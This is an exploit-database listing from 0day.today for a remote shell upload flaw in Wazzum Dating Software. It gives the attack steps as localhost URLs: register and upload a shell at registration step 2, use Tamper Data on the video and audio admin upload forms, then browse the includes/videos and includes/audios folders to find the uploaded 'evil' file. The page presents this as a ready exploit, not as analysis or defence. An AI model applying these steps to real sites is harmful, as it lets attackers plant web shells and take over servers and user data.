[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wazzum Dating Software remote shell upload Vulnerability

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11376
Category
web applications
Date add
20-03-2010
Platform
unsorted
========================================================
Wazzum Dating Software remote shell upload Vulnerability
========================================================

========================================================================================                  
| ( Title    ) Wazzum Dating Software Mullti Vulnerability    
| ( Author   ) El-Kahina                                                               
| ( email    ) please forgive me                                                                                                                            |
| ( Web Site ) www.h4kz.com                                                                                                                                 
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html          
| ( Bug      ) Upload    
|                                                                  
======================      Exploit By EL-Kahina       =================================
 # Exploit  : 
 
 1 - Register - Step 1
 
 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
                  
 2 - Register - Step 2
 
 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
 
 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data
  
 http://127.0.0.1/Wazzum//includes/videos/ to find evil 
 
 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data
 
 http://127.0.0.1/Wazzum//includes/audios/ to find evil




#  0day.today [2024-11-16]  #